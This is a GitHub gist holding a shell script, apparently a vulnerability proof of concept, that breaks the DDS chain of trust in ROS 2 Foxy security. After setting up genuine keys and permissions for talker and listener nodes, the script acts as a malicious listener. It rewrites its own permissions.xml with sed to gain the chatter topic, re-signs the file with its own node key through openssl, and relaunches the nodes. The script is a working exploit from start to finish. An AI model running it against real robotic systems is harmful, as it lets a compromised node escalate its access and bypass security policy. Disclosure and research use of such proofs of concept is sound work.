Skip to content

Instantly share code, notes, and snippets.

@vmayoral
Created February 25, 2023 08:30
Show Gist options
  • Save vmayoral/235c02d0b0ef85a29812eff6980ff80d to your computer and use it in GitHub Desktop.
Save vmayoral/235c02d0b0ef85a29812eff6980ff80d to your computer and use it in GitHub Desktop.
Proof of concept of Data Distribution Service (DDS) Chain of Trust (CoT) violation
#!/bin/sh
msg () {
echo
: "=== $* ==="
sleep 2
}
. /opt/ros/foxy/setup.sh
set -x
msg "Creating keystore"
export ROS_SECURITY_ENABLE=true
export ROS_SECURITY_STRATEGY=Enforce
export ROS_SECURITY_KEYSTORE=.
ros2 security create_keystore .
ros2 security create_key . /talker
ros2 security create_key . /listener
msg "Creating genuine permissions"
cat >node.xml <<POLICY
<?xml version="1.0" encoding="UTF-8"?>
<profile>
<topics publish="ALLOW">
<topic>/rosout</topic>
</topics>
<topics subscribe="ALLOW">
<topic>/clock</topic>
</topics>
<topics publish="ALLOW" subscribe="ALLOW" >
<topic>/parameter_events</topic>
</topics>
<services reply="ALLOW" request="ALLOW" >
<service>~/describe_parameters</service>
<service>~/get_parameter_types</service>
<service>~/get_parameters</service>
<service>~/list_parameters</service>
<service>~/set_parameters</service>
<service>~/set_parameters_atomically</service>
</services>
</profile>
POLICY
cat >policy.xml <<POLICY
<?xml version="1.0" encoding="UTF-8"?>
<policy version="0.2.0" xmlns:xi="http://www.w3.org/2001/XInclude">
<enclaves>
<enclave path="/talker">
<profiles>
<profile ns="/" node="talker">
<xi:include href="node.xml" xpointer="xpointer(/profile/*)"/>
<topics publish="ALLOW" >
<topic>chatter</topic>
</topics>
</profile>
</profiles>
</enclave>
<enclave path="/listener">
<profiles>
<profile ns="/" node="listener">
<xi:include href="node.xml" xpointer="xpointer(/profile/*)"/>
<topics subscribe="ALLOW">
<topic>something_else</topic>
</topics>
</profile>
</profiles>
</enclave>
</enclaves>
</policy>
POLICY
cat >launch.xml <<LAUNCH
<launch>
<node pkg="demo_nodes_cpp" exec="talker">
<env name="ROS_SECURITY_ENCLAVE_OVERRIDE" value="/talker"/>
</node>
<node pkg="demo_nodes_py" exec="listener">
<env name="ROS_SECURITY_ENCLAVE_OVERRIDE" value="/listener"/>
</node>
</launch>
LAUNCH
ros2 security create_permission . /talker policy.xml
ros2 security create_permission . /listener policy.xml
msg "Running nodes with correct permissions"
ros2 launch launch.xml &
sleep 10 && kill $!
msg "Creating malicious permissions document"
# For this step we are acting as a malicious node /listener. We do not
# access any files outside the enclaves/listener directory.
sed -i -e's!rt/something_else!rt/chatter!' enclaves/listener/permissions.xml
openssl smime -sign -text -in enclaves/listener/permissions.xml \
-out enclaves/listener/permissions.p7s \
-signer enclaves/listener/cert.pem \
-inkey enclaves/listener/key.pem
msg "Running nodes with malicious permissions"
ros2 launch launch.xml &
sleep 10 && kill $!
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment